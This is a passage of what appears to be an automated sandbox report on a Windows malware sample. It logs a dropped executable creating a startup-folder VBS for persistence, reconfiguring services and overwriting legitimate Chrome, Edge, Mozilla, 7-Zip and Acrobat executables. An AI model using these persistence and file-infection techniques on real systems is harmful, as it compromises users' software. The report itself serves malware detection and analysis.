                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,1_2_00A9CBD0

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Writes data at the end of the disk (often used by bootkits to hide malicious code)
                  Source: C:\Windows\SysWOW64\mshta.exeFile written: C:\Users\user\AppData\Local\Temp\x.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Roaming\31d53b0537b9f482.bin offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\Temp\autE8B0.tmp offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\Temp\autE8B0.tmp offset: 196608Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\Temp\avenses offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\Temp\avenses offset: 196608Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\Temp\avenses offset: 208896Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 95744Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 669260Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 672768Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 1220608Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 1221632Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 1224840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 669184Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 53125Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Users\user\AppData\Local\subpredicate\differences.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 767488Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1341004Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1344512Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1347720Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Windows\System32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.bin offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 557056Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130572Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130496Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 382726Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 952832Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 614020Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zFM.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 700416Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273932Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273856Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 464916Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
